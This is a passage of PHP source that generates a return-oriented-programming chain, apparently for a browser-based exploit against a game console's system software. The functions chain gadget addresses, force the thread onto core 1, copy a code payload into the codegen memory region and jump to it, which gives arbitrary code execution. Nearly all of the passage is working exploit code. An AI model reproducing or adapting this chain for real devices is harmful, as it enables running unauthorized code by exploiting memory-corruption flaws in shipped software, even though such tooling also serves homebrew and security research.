); ropchain_appendu32($r28);//r28 ropchain_appendu32(0x0);//r29 ropchain_appendu32(0x0);//r30 ropchain_appendu32(0x0);//r31 ropchain_appendu32(0x0); ropgen_OSFatal($outstr); } function ropgen_switchto_core1() { global $ROP_OSGetCurrentThread, $ROP_OSSetThreadAffinity, $ROP_OSYieldThread, $ROP_CALLR28_POP_R28_TO_R31; ropgen_callfunc($ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, $ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below. ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(, 0x2); ropchain_appendu32($ROP_OSYieldThread);//r28 ropchain_appendu32(0x0);//r29 ropchain_appendu32(0x0);//r30 ropchain_appendu32(0x0);//r31 ropchain_appendu32(0x0); ropchain_appendu32($ROP_CALLR28_POP_R28_TO_R31); ropchain_appendu32(0x0);//r28 ropchain_appendu32(0x0);//r29 ropchain_appendu32(0x0);//r30 ropchain_appendu32(0x0);//r31 ropchain_appendu32(0x0); } function generateropchain_type1() { global $ROP_OSFatal, $ROP_Exit, $ROP_OSDynLoad_Acquire, $ROP_OSDynLoad_FindExport, $ROP_os_snprintf, $payload_srcaddr, $ROPHEAP; $payload_size = 0x20000;//Doesn't really matter if the actual payload data size in memory is smaller than this or not. $codegen_addr = 0x01800000; //$payload_srcaddr must be defined by the code including this .php. //ropgen_colorfill(0x1, 0xff, 0xff, 0x0, 0xff);//Color-fill the gamepad screen with yellow. //ropchain_appendu32(0x80808080);//Trigger a crash. //ropgen_OSFatal($codepayload_srcaddr);//OSFatal(); ropgen_switchto_core1();//When running under internetbrowser, only core1 is allowed to use codegen. Switch to core1 just in case this thread isn't on core1(with some exploit(s) it may already be one core1, but do this anyway). OSSetThreadAffinity() currently returns an error for this, hence this codebase is only usable when this ROP is already running on core1. ropgen_copycodebin_to_codegen($codegen_addr, $payload_srcaddr, $payload_size); //ropgen_colorfill(0x1, 0xff, 0xff, 0xff, 0xff);//Color-fill the gamepad screen with white. $regs = array(); $regs[24 - 24] = $ROP_OSFatal;//r24 $regs[25 - 24] = $ROP_Exit;//r25 $regs[26 - 24] = $ROP_OSDynLoad_Acquire;//r26 $regs[27 - 24] = $ROP_OSDynLoad_FindExport;//r27 $regs[28 - 24] = $ROP_os_snprintf;//r28 $regs[29 - 24] = 0x0;//r29 $regs[30 - 24] = 0x0;//r30 $regs[31 - 24] = $ROPHEAP;//r31 ropgen_pop_r24_to_r31($regs);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase. ropchain_appendu32($codegen_addr);//Jump to the codegen area where the payload was written. } ?>